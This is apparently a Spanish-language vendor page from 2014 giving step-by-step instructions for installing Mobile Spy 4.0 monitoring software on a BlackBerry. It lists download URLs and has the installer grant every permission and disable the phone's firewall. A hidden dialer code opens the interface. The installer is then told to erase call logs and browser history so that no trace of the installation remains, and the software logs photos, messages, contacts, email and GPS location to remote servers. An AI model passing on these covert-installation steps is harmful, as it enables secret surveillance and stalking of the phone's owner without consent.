Instalación de Mobile Spy 4.0 en BlackBerry

Esta página contiene las instrucciones paso a paso para intervenir un BlackBerry con Mobile Spy 4.0. La instalación tardará aproximadamente de cinco a diez minutos, y después ya podrá monitorizar la actividad de la BlackBerry desde su cuenta. En esta guía se entiende que ya ha creado dicha cuenta tal y como se describe en la guía del usuario.

Esta versión incluye la posibilidad de ver todas las fotos y videos tomados por el dispositivo. Adicionalmente, se registrarán todos los nuevos contactos, tareas, notas, localizaciones de identificadores de célula, email, y eventos del calendario.

NOTA: Si tiene un firewall activado en el terminal BlackBerry y necesita desactivarlo, consulte las instrucciones específicas.

INSTRUCCIONES PARA INSTALAR MOBILE SPY EN UN BLACKBERRY

Después de haber creado su nombre de usuario y contraseña, debe seguir estos sencillos pasos. No es necesario conectar el teléfono al ordenador.

1. Deberá comprobar la versión del sistema operativo BlackBerry para determinar qué archivo de Mobile Spy debe instalar.

Para comprobar dicha versión, asegúrese de que su teléfono está en su pantalla principal. A continuación, pulse el botón BlackBerry (patrón de tablero de ajedrez con siete cuadros) para pasar al menú principal. A continuación, seleccione la carpeta Configuración. Una vez allí, seleccione la carpeta Opciones, y después, Acerca de.

Para las versiones 4.x y 5.0, utilice: http://asd-ms.com/bb40/bb.jad

Para la versión 4.7 únicamente, utilice: http://asd-ms.com/bb41/bb.jad

Para modelos de pantalla táctil, utilice: http://asd-ms.com/bbt/Smartphone_V2.jad

Abra el navegador web del terminal BlackBerry y escriba la dirección apropiada para su sistema operativo. A continuación, pulse Intro.

2. Marque la casilla "Habilitar permisos de aplicación" (Set Application Permissions), como se muestra a continuación, y haga clic en el botón azul de descarga.

3. Cuando aparezca la pantalla de permisos, cambie todos los elementos de las tres categorías a "Permitir" (Allow). A continuación, haga clic en el botón BlackBerry y vaya a Guardar como se muestra a continuación.


4. A continuación se le preguntará si quiere reiniciar el dispositivo para completar la instalación. Elija “Later” (Después).

Ahora debe reiniciar el teléfono para iniciar el programa por primera vez. Simplemente retire la batería durante 30 segundos y vuelva a insertarla.

Cuando el teléfono vuelva a encenderse, puede recibir un mensaje pidiendo permisos para la aplicación una vez más. La pantalla será similar a la mostrada a continuación:

Simplemente seleccione “Allow” (Permitir) para cada mensaje que aparezca. Estos mensajes solo se muestran durante la instalación inicial. Después no volverán a aparecer.

5. Una vez que se reinicie el teléfono, Acceda a la interfaz. Sólo tiene que marcar #10001* y pulsar Llamar. La pantalla de entrada a la interfaz aparecerá.

Nota: Puede cambiar los cinco números de la clave por otros cinco que prefiera en la opción "Change PIN" (Cambiar PIN).

6. Cuando la interfaz aparece por primera vez, se le pedirá que introduzca su nombre de usuario y contraseña. Recuerde escribirlos exactamente igual que cuando los creó, ya que se diferencian las mayúsculas. A continuación, pulse el botón BlackBerry y seleccione Entrar (login). No se le pedirá de nuevo su nombre de usuario y contraseña, ya que Mobile Spy guardará la información.

7. Una vez conectado, aparecerá esta pantalla. Es la interfaz de usuario de Mobile Spy. Aquí puede seleccionar las comunicaciones que quiere monitorizar. Además, puede configurar el intervalo de tiempo en que Mobile Spy registrará la localización por GPS y cambiar la clave de acceso. Para cambiar otros parámetros, presione el botón BlackBerry y seleccione la opción correspondiente del menú.

Para cambiar el intervalo de registro del GPS, mueva el cursor sobre el campo que desea cambiar. A continuación, pulse el selector para que aparezca un menú desplegable con las opciones disponibles (no puede escribir un valor numérico). Puede seleccionar entre los minutos y horas para la Unidad y magnitud de tiempo que desea en los intervalos.

8. Cuando haya terminado de adaptar Mobile Spy a sus necesidades, pulse el botón BlackBerry y seleccione la opción Salir.

Cuando regrese a la pantalla principal, debe reiniciar el teléfono para que se reconozca la nueva configuración. Para ello, retire la batería durante 30 segundos y vuelva a insertarla. Una vez que el teléfono se vuelva a encender, Mobile Spy estará activado.

Después de la instalación, asegúrese de borrar todos los registros de llamadas y el historial de páginas web visitadas para eliminar cualquier rastro de que Mobile Spy se ha instalado en el dispositivo.

NOTAS IMPORTANTES

Cada vez que realice cambios en la configuración de Mobile Spy, el teléfono necesita ser reiniciado para aplicar los cambios. Para ello, retire la batería durante 30 segundos y vuelva a insertarla.

Ya está listo para monitorizar el teléfono con Mobile Spy. Para comprobar los registros, vaya a esta página específica de acceso: https://www.mobilespylogs.com.

Puede visitar la guía del usuario para obtener más información sobre la consulta de registros.

SI LA INTERFAZ NO APARECIERA

Si la interfaz de Mobile Spy no apareciera en su BlackBerry después de marcar #10001*, hay dos maneras alternativas de hacerla aparecer:

1. Marque #10001* otra vez. Cuando la llamada se desconecte, pulse en el botón Atrás, seguido por el botón Finalizar (como si estuviera colgando una llamada).

2. Marque #10001* otra vez. Pulse el botón BlackBerry. A continuación, seleccione Cambiar Aplicación. Aquí encontrará un icono para "Smartphone", entre otros iconos (pantalla de inicio, teléfono, etc.) Seleccione “Smartphone”. La interfaz debería aparecer.

COMPROBACIÓN DE SU CONEXIÓN A INTERNET

Si no está seguro de tener conexión a Internet, hay una opción dentro de Mobile Spy para comprobar y verificar la conexión a Internet.

1. Marque #10001* y llamar para que aparezca la interfaz de Mobile Spy.

2. Una vez dentro de la interfaz, pulse el botón BlackBerry.

3. Seleccione "Troubleshoot" (Resolución de problemas).

4. A continuación, aparecerá un cuadro azul con el mensaje "Verify Internet" (Comprobar Internet). Selecciónelo.

Mobile Spy verificará la conexión a Internet para asegurarse de que puede conectarse a nuestros servidores y subir los registros.

DESACTIVACIÓN DEL FIREWALL DE BLACKBERRY

Si el terminal BlackBerry tiene un firewall activo, tendrá que desactivarlo para evitar el siguiente mensaje de error cuando se envíen mensajes de texto SMS y llamadas:

"Mensaje de error: Aplicación P. ¿Quiere permitir que Smartphone v2 actúe como un servidor? Permitir (X) No permitir ( ) No pedir para SMS (X)."

"ERROR Message: Application P. Do you want to let Smartphone v2 to act as a server? Allow (X) Denied ( ). Do not ask for SMS (X)."

1. En la pantalla Inicio, pulse el botón Menú BlackBerry.
2. Seleccione el menú Opciones.
3. Seleccione el menú Opciones de seguridad.
4. Seleccione el menú Firewall.
5. Seleccione el campo de estado y seleccione Deshabilitar.
6. Pulse el botón Menú BlackBerry y seleccione Guardar.
7. Pulse la tecla Finalizar.

BORRADO DE MOBILE SPY

Para quitar el programa del BlackBerry, haga que aparezca la interfaz y vaya a Menú > Uninstall (Desinstalar). A continuación se le pedirá que reinicie su teléfono para completar el proceso de eliminación. Seleccione reiniciar el sistema ahora y el programa se habrá eliminado.


SOPORTE

Guía del usuario
Documentación de Mobile Spy.

Ver guía del usuario >>>

Base de datos de preguntas
Sobre las características del producto.

Ver base de datos >>>

Localice su pedido
Vea los detalles de su orden.

Por favor visite nuestro sitio global >>>

Recuperar su descarga
Obtenga una nueva descarga en nuestro sitio global

Por favor visite nuestro sitio global >>>

Acerca de REX
Perfil de la organización.

Más información sobre REX >>>

Abrir un ticket de soporte
Contacte con nosotros para preguntas y ayuda.

Abrir nuevo ticket >>>



Teléfonos celulares compatibles

Cualquier Android, iPhone, BlackBerry, Symbian o Windows Mobile, incluyendo muchos modelos de Apple, Samsung, Nokia, Motorola, HTC, más...

Operadores de telefonía compatibles

Telcel, Movistar, Iusacell, Nextel, más...

Características - Comprar - Soporte - Información legal - Mobile Spy
© 2014 REX Todos los derechos reservados.
NOTA: Todas las marcas registradas que aparecen en este sitio son propiedad de sus respectivos dueños.
Estas empresas no están asociadas con MobileSpy.com.mx de ninguna manera. Las marcas mencionadas se utilizan
con el único fin de describir los celulares y operadores compatibles con nuestro programa espía.